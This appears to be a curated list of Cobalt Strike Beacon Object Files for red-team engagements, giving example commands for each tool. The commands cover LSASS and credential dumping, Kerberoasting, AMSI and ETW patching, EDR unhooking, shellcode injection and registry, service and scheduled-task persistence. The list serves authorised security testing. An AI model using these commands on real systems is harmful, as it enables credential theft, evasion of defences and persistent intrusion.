Useful Cobalt Strike Beacon Object Files (BOFs) used during red teaming and penetration testing engagements.
- TrustedSec Situational Awareness BOF
BOF that provides host enumeration and awarness commands which are more opsec friendly
Example commands include:
arp --> List arp tables
ipconfig --> Run ipconfig
ldapsearch [query]
listdns --> Pulls DNS cache
netuser [username] [opt: domain] --> Get info on user account
nslookup [hostname] --> Perform DNS query
tasklist --> Get local running processes
- Find Objects BOF
Use direct system calls to enumerate processes for specific loaded modules (amsi.dll, clr.dll) or process handles (lsass.exe)
Avoids fork&run
FindModule amsi.dll
FindProcHandle lsass.exe
- BOF Collection
A set of BOFs useful for enumeration and exploitation. Examples include:
inline-execute GetDomainInfo.o --> Get domain info from DC
inline-execute GetClipboard.o --> Prints any text on the user's clipboard
enumwifi --> Enumerate wifi connections
dumpwifi Wifi_Profile_Name --> Dump wifi cleartext credentials
bofportscan 192.168.1.10 3389 --> Port scanner
inline-execute RegistryPersistence.o Install --> Install registry persistence
inline-execute RegistryPersistence.o Remove --> Remove registry persistence
-
whereami
A "Where Am I" BOF which is a way to run the whoami.exe binary but in an opsec safe way by pulling the info from the current beacon process memory.
Also pulls current environment variables.
whereami -
RiccardoAncarani BOFs
A useful BOF collection to perform various tasks in a safer opsec way.
send_shellcode_via_pipe <pipe> <file> --> Send shellcode or any byte via a named pipe
cat <file> --> Read file, supports remote shares
wts_enum_remote_processes <host> --> Enumerate remote processes using WTS APIs
unhook <module>, unhook ntdll.dll --> Use direct syscalls to unhook APIs of a specific DLL (works only on 64-bit beacons)
- Outflank C2 Tool Collection
Great list of useful tools converted to BOFs for better opsec.
Tools like add machine account, kerberoast, LAPS password dump, SMB info, LDAP AD spray, and more!
AddMachineAccount [*Computername] [Optional Password] --> Create new machine account - requires MachineAccountQuota to create new account
Domaininfo --> Enumerate AD domain
Lapsdump <computername> --> Dump LAPS passwowrds on remote systems within AD (requires elevated privileges on target)
Smbinfo <compuername> --> Get SMB info of remote system
Winver --> Shows the version of Windows that is running on the local system
-
InlineExecute-Assembly
Perform .NET assembly execution of any .NET executable without any prior modifications required
The BOF also supports several flags to disabling AMSI via in memory patching, disabling and restoring ETW via in memory patching, or customization of the CLR App Domain name to be created
inlineExecute-Assembly --dotnetassembly /home/Seatbelt.exe --assemblyargs AntiVirus AppLocker --etw --amsi --mailslot totallyLegitMailslot -
inject-assembly
Another alternative .NET executable loader to inject an assembly into a running process
inject-assembly 0 /home/Rubeus.exe [args...]
- ajpc500 BOFs
A collection of very useful BOFs for various utilities including different techniques of shellcode injection with syscalls, process dumping (LSASS!), and patching ETW for better evasion.
etw stop --> Patch etw
syscalls_inject <PID> <listener_name> / syscalls_shinject <PID> <path_to_bin> --> Syscalls shellcode injection
syscalls_spawn <listener> / syscalls_shspawn <path_to_bin> --> Spawn and syscalls injections
static_syscalls_apc_spawn <listener> / static_syscalls_apc_spawn <path_to_bin> --> Spawn and static syscalls shellcode njection (NtQueueApcThread)
static_syscalls_inject <PID> <listener_name> / static_syscalls_shinject <PID> <path_to_bin> --> Static syscalls shellcode injection (NtCreateThreadEx)
static_syscalls_dump <PID> [path_to_output] --> Process dump with syscalls (i.e. Dump LSASS!)
-
MiniDumpWriteDump
Uses static syscalls to dump a process such as LSASS to output file
minidumpwritedump <PID> <path_of_dmp?> -
SilentLsassDump
Uses direct syscalls generated from https://github.com/outflanknl/InlineWhispers
Dump the LSASS process via the silent process exit mechanism into the C:\Temp directory
silentLsassDump <LSASS PID> -
Unhook BOF
Created by Raphael Mudge, this BOF will attempt to unhook userland APIs to bypass EDR
Sort of the "hail mary" for attempting to unhook APIs
unhook -
WdToggle
Enables WDigest credential caching using direct system calls
Bypasses Windows Credential Guard if enabled
inline-execute WdToggle.o --> First enable WdDigest caching
logonpasswords --> Second, wait for users to login and then run Mimikatz to dump their newly cached cleartext passwords
- TrustedSec CS-Remote-OPs-BOF
Great repo of new BOFs from TrustedSec to follow up their SituationalAwareness BOFs.
Includes dumping a process, decrypting Chrome keys, persistence techniques (registry, scheduled tasks, services), and more!
adcs_request --> Request an enrollment certificate
procdump --> Dump specified process to output file
reg_set --> Set/create a registry key
sc_create --> Create a new service
schtaskscreate --> Create a new scheduled task
setuserpass --> Set a users password
-
Inject AMSI Bypass
BOF that bypasses AMSI in a remote process with code injection
inject-amsiBypass <PID> -
Inject ETW Bypass
Inject ETW Bypass into Remote Process via Syscalls
injectEtwBypass <PID> -
Kerberoast BOF
BOF for targeted Kerberoasting against input SPN to roast
Returns TGS that you can pass to apreq2hashcat.py (provided in repo) to output the hashcat format
kerberoast SPN/HOSTNAME.domain.local
-
BOF Template
Used for creating your very own BOFs! -
BOF Hound
An offline BloodHound ingestor and LDAP parser to be used with TrustedSec's "ldapsearch".
Use ldapsearch in Cobalt Strike to gather data and then use bofhound on your CS logs to generate JSON files for importing into BloodHound.
bofhound -o /data/ -
Help Color
Color helper Aggressor script for coloring "help" output based on command type and OPSEC
helpx